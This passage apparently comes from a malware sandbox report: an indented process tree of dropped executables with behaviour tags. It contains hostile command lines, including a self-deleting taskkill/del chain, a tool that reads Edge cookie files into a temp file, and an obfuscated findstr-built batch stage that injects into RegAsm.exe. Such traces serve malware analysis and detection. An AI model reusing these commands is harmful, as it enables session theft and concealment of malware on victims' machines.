                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4335924.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4335924.exe"
                                                                                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6734823.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6734823.exe"
                                                                                                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                                                                                                    PID:10076
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\VgohHpl9badRv3ineLIzLx9N.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\VgohHpl9badRv3ineLIzLx9N.exe"
                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5164
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe"
                                                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6100
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\lKlWPLcFn0TQHBLaGOL5x3ki.exe"
                                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:6036
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe"
                                                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                      PID:10016
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im cWfFC4E4HL7NXP1ZiF4e2Zkl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\cWfFC4E4HL7NXP1ZiF4e2Zkl.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7996
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                            taskkill /im cWfFC4E4HL7NXP1ZiF4e2Zkl.exe /f
                                                                                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                            PID:10072
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                            PID:9640
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe"
                                                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                                                          PID:10152
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\IYrZXsOIuv1RpGpfxRgtb8AL.exe" -a
                                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2268
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe"
                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                    PID:8712
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\UvgYcrQXt00cBiMTplNLcnKT.exe" -a
                                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                                        PID:8692
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe"
      14⤵
      PID:7004
      • C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe
        "C:\Users\Admin\Documents\5jREyhcdpd_RyalWEiezawM0.exe"
        15⤵
        • Modifies data under HKEY_USERS
        PID:9024
    • C:\Users\Admin\Documents\L5flnjcJuudBmw_cvU8QgaDT.exe
      "C:\Users\Admin\Documents\L5flnjcJuudBmw_cvU8QgaDT.exe"
      14⤵
      PID:6492
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
        15⤵
        PID:7072
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          16⤵
          PID:6256
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
            17⤵
            PID:10036
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\Acre.exe.com
            Acre.exe.com k
            17⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            PID:9548
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\RegAsm.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\RegAsm.exe
              18⤵
              PID:5780
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 30
            17⤵
            • Runs ping.exe
            PID:9404
    • C:\Users\Admin\Documents\cZ0MZnndwT_5BtnSarWrozwc.exe
      "C:\Users\Admin\Documents\cZ0MZnndwT_5BtnSarWrozwc.exe"
      14⤵
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:7080
      • C:\Users\Admin\AppData\Roaming\1234.exe
        C:\Users\Admin\AppData\Roaming\1234.exe 1234
        15⤵
        • Suspicious use of SetThreadContext
        PID:10064
        • C:\Users\Admin\AppData\Roaming\1234.exe
          "{path}"
          16⤵
          PID:4476
        • C:\Users\Admin\AppData\Roaming\1234.exe
          "{path}"
          16⤵
          PID:11236
    • C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
      "C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe"
      14⤵
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      PID:8428
      • C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
        C:\Users\Admin\Documents\bwvOlAiGulXhrlWNAUDfnupi.exe
        15⤵
        PID:5716
    • C:\Users\Admin\Documents\tCjtKMq_ssR4Qgjq1V0OjHhj.exe
      "C:\Users\Admin\Documents\tCjtKMq_ssR4Qgjq1V0OjHhj.exe"
      14⤵
      PID:8800
      • C:\Users\Admin\AppData\Roaming\3443978.exe
        "C:\Users\Admin\AppData\Roaming\3443978.exe"
        15⤵
        PID:6024
• C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  12⤵
  PID:10708
• C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  12⤵
  PID:8292
• C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  12⤵
  PID:5600
• C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  12⤵
  PID:7440
• C:\Users\Admin\Documents\BMNiBPiHx2AxtHmC_l9AQP6t.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\BMNiBPiHx2AxtHmC_l9AQP6t.exe"
                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6148
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe"
                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                PID:6084
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\z1AQsxvCHZ3rHBnSM53C1Lay.exe"
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                  PID:5904
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe"
                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                PID:620
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\3HEQKuipu2FgKVXQDTAnOuwf.exe
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7104
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\oVKKbmntquO8nFyg6iKBeJuw.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\oVKKbmntquO8nFyg6iKBeJuw.exe"
                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                  PID:6132
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe"
                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7024
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\abF6zpWGuLTXPHWuXoQJYQmf.exe
                                                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2132
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im xKdTfqts19OSJeYygrVD7PCJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xKdTfqts19OSJeYygrVD7PCJ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8144
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                              taskkill /im xKdTfqts19OSJeYygrVD7PCJ.exe /f
                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                              PID:7124
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                              PID:9088
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\c2q20zP3GdpD5iJo5GTMJMis.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\c2q20zP3GdpD5iJo5GTMJMis.exe"
                                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7291473.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7291473.exe"
                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7548
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\yPJJpsibSpAvmvQLd58bVbon.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\yPJJpsibSpAvmvQLd58bVbon.exe"
  11⤵
  • Executes dropped EXE
  • Checks computer location settings
  PID:3792
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
    12⤵
    PID:6752
    • C:\Windows\SysWOW64\cmd.exe
      cmd
      13⤵
      PID:2684
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
        14⤵
        PID:6808
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
        Acre.exe.com k
        14⤵
        PID:3840
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 30
        14⤵
        • Runs ping.exe
        PID:5912
• C:\Users\Admin\Documents\U1hG6VPC773nzQRJrOX4TwzB.exe
  "C:\Users\Admin\Documents\U1hG6VPC773nzQRJrOX4TwzB.exe"
  11⤵
  • Executes dropped EXE
  • Drops file in Program Files directory
  PID:5116
• C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe
  "C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe"
  11⤵
  PID:6640
  • C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe
    "C:\Users\Admin\Documents\D8c4jmmX13r1M6MaQkGtk5Ll.exe" -a
    12⤵
    PID:5132
• C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
  "C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe"
  11⤵
  PID:4720
  • C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
    C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
    12⤵
    • Loads dropped DLL
    • Checks processor information in registry
    PID:8088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im SMlFsKgkWRAsC6vCCHJ8UddG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe" & del C:\ProgramData\*.dll & exit
      13⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5076
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im SMlFsKgkWRAsC6vCCHJ8UddG.exe /f
        14⤵
        • Kills process with taskkill
        PID:7036
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 6
        14⤵
        • Delays execution with timeout.exe
        PID:2400
  • C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
    C:\Users\Admin\Documents\SMlFsKgkWRAsC6vCCHJ8UddG.exe
    12⤵
    PID:8076
• C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
  "C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe"
  11⤵
  • Executes dropped EXE
  • Suspicious use of SetThreadContext
  PID:4120
  • C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
    C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
    12⤵
    PID:6840
• C:\Users\Admin\Documents\Z4zW4fOlwHjE6tHOO22rqkZU.exe
  "C:\Users\Admin\Documents\Z4zW4fOlwHjE6tHOO22rqkZU.exe"
  11⤵
  PID:6372
  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\setup_install.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6560
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7180
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4980
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2912
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8304
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im PFMkmfx7jQf3PnRsswu6O3o_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                17⤵
      PID:2268
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im PFMkmfx7jQf3PnRsswu6O3o_.exe /f
          18⤵
          • Kills process with taskkill
          PID:7880
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          18⤵
          • Delays execution with timeout.exe
          PID:8472
• C:\Users\Admin\Documents\4teFeqb_TJUFlAjmfvFM7kG6.exe
  "C:\Users\Admin\Documents\4teFeqb_TJUFlAjmfvFM7kG6.exe"
  16⤵
  • Checks BIOS information in registry
  • Checks whether UAC is enabled
  • Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6152
• C:\Users\Admin\Documents\58CDII4CZx7lCH54C57KLXvG.exe
  "C:\Users\Admin\Documents\58CDII4CZx7lCH54C57KLXvG.exe"
  16⤵
  PID:5752
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
      17⤵
      PID:7864
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          18⤵
          PID:5836
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          18⤵
          PID:7148
            • C:\Windows\SysWOW64\findstr.exe
              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
              19⤵
              PID:9084
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\Acre.exe.com
              Acre.exe.com k
              19⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              PID:8548
                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\RegAsm.exe
                  20⤵
                  PID:8104
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1 -n 30
              19⤵
              • Runs ping.exe
              PID:2792
• C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
  "C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe"
  16⤵
  • Suspicious use of SetThreadContext
  PID:5936
    • C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
      C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
      17⤵
      • Loads dropped DLL
      • Checks processor information in registry
      PID:9168
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im I4tsdsJBxwYHSFGjezspU5JO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe" & del C:\ProgramData\*.dll & exit
          18⤵
          PID:8444
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im I4tsdsJBxwYHSFGjezspU5JO.exe /f
              19⤵
              • Kills process with taskkill
              PID:5720
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 6
              19⤵
              • Delays execution with timeout.exe
              PID:10136
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\sS4FrZenwxYzPAetuRKwHWQT.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\sS4FrZenwxYzPAetuRKwHWQT.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7752
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8284
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
